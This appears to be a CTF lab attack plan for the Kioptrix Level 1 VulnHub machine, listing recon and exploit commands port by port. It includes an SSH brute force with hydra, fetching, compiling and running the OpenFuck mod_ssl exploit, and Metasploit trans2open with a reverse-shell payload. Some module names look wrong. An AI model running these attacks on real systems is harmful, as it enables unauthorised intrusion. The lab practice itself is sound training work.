========================================================
  KIOPTRIX LEVEL 1 - ATTACK SURFACE ANALYSIS
  Target: 192.168.1.184
========================================================

TARGET SUMMARY
--------------
Hostname  : KIOPTRIX
OS        : Linux 2.4.x (Red Hat)
MAC       : 08:00:27:AF:60:FF (VirtualBox VM)


========================================================
PORT-BY-PORT ATTACK BREAKDOWN
========================================================

------------------------------------------------------------
[PORT 22] SSH - OpenSSH 2.9p2 (Protocol 1.99 / SSHv1)
------------------------------------------------------------
WHY IT'S INTERESTING:
  - SSHv1 is cryptographically broken (vulnerable to MITM, bit-flip attacks)
  - OpenSSH 2.9p2 is ancient — released ~2001
  - Protocol 1.99 means it supports BOTH SSHv1 and SSHv2

ATTACK VECTORS:
  1. SSH Protocol 1 MITM / session hijacking
  2. Brute force with common credentials (root:root, root:password, etc.)
  3. CVE search for OpenSSH < 3.x vulnerabilities

COMMANDS:
  # Brute force with hydra
  hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.184

  # Try default creds manually
  ssh -1 root@192.168.1.184


------------------------------------------------------------
[PORT 80 / 443] HTTP/HTTPS - Apache 1.3.20 + mod_ssl 2.8.4 + OpenSSL 0.9.6b
------------------------------------------------------------
WHY IT'S INTERESTING:
  - Apache 1.3.20 is extremely outdated (2001)
  - mod_ssl 2.8.4 with OpenSSL 0.9.6b — this combo has a CRITICAL known RCE
  - SSLv2 is enabled (DROWN attack surface)
  - TRACE method is enabled (XST — Cross-Site Tracing)
  - SSL cert expired in 2010

*** MOST PROMISING ATTACK VECTOR ***
  CVE-2002-0082 — OpenFuck / mod_ssl Remote Buffer Overflow
  This is the classic Kioptrix exploit. mod_ssl 2.8.4 / Apache 1.3.20
  is directly vulnerable to a remote buffer overflow that gives a shell.

EXPLOIT:
  # Search for the exploit
  searchsploit mod_ssl 2.8.4

  # The exploit is "OpenFuck" (764.c) — needs to be compiled
  # Updated version: "OpenFuckV2" or use the Metasploit module:
  msfconsole
  use exploit/unix/webapp/openssl_ptrace
  # OR the older:
  use exploit/multi/handler

  # Manual compile of OpenFuck:
  wget https://raw.githubusercontent.com/heltonWernik/OpenFuck/master/OpenFuck.c
  apt-get install libssl-dev
  gcc -o OpenFuck OpenFuck.c -lcrypto
  ./OpenFuck          # lists available targets
  ./OpenFuck 0x6b 192.168.1.184 443 -c 40   # 0x6b = RedHat/Apache 1.3.20

ADDITIONAL HTTP ATTACKS:
  # Directory brute force
  gobuster dir -u http://192.168.1.184 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
  nikto -h http://192.168.1.184

  # TRACE method abuse
  curl -X TRACE http://192.168.1.184

  # SSLv2 / DROWN check
  sslscan 192.168.1.184:443


------------------------------------------------------------
[PORT 139] Samba / NetBIOS - smbd (workgroup: JMYGROUP)
------------------------------------------------------------
WHY IT'S INTERESTING:
  - Samba version is unknown but given the era (Linux 2.4.x, ~2001-2002)
    it's likely Samba 2.x which has critical vulnerabilities
  - SMB2 negotiation failed = very old Samba
  - NetBIOS name leaks hostname: KIOPTRIX

*** SECOND MOST PROMISING ATTACK VECTOR ***
  CVE-2003-0201 — Samba "trans2open" Buffer Overflow (Samba < 2.2.8)
  Remote root exploit, no authentication required.

COMMANDS:
  # Enumerate Samba version
  smbclient -L //192.168.1.184 -N
  enum4linux -a 192.168.1.184
  nmblookup -A 192.168.1.184

  # Check exact version with metasploit auxiliary
  msfconsole
  use auxiliary/scanner/smb/smb_version
  set RHOSTS 192.168.1.184
  run

  # Exploit trans2open if Samba < 2.2.8
  use exploit/linux/samba/trans2open
  set RHOSTS 192.168.1.184
  set PAYLOAD linux/x86/shell_reverse_tcp
  set LHOST <your-kali-ip>
  run

  # Manual searchsploit
  searchsploit samba 2.2


------------------------------------------------------------
[PORT 111] RPC Bind + [PORT 32768] RPC Status
------------------------------------------------------------
WHY IT'S INTERESTING:
  - rpcbind exposes what RPC services are running
  - Port 32768 is the RPC status service
  - Old RPC services can have buffer overflows

COMMANDS:
  # Enumerate RPC services
  rpcinfo -p 192.168.1.184

  # Check for NFS shares (common on old Linux)
  showmount -e 192.168.1.184

  # If NFS shares exist, mount them:
  mkdir /mnt/nfs
  mount -t nfs 192.168.1.184:/export /mnt/nfs -nolock


========================================================
RECOMMENDED ATTACK ORDER (EASIEST TO HARDEST)
========================================================

1. [HIGHEST CHANCE] mod_ssl / OpenFuck (port 443)
   -> Remote root via CVE-2002-0082
   -> Metasploit or compiled OpenFuck.c

2. [HIGH CHANCE] Samba trans2open (port 139)
   -> Remote root via CVE-2003-0201
   -> Metasploit exploit/linux/samba/trans2open

3. [RECON] RPC / NFS enumeration (port 111 / 32768)
   -> May expose readable/writable NFS shares
   -> Could lead to SSH key injection or file read

4. [SLOW] SSH brute force (port 22)
   -> Last resort, use hydra with small wordlist


========================================================
QUICK WINS CHECKLIST
========================================================

[ ] Run: enum4linux -a 192.168.1.184
[ ] Run: nikto -h http://192.168.1.184
[ ] Run: sslscan 192.168.1.184:443
[ ] Run: rpcinfo -p 192.168.1.184
[ ] Run: showmount -e 192.168.1.184
[ ] Try: OpenFuck exploit against port 443
[ ] Try: Metasploit trans2open against port 139


========================================================
NOTES
========================================================
- This is Kioptrix Level 1 (VulnHub) — a legal CTF practice machine
- Both mod_ssl and Samba exploits typically give direct root
- Always set LHOST to your Kali IP (check with: ip a)
========================================================
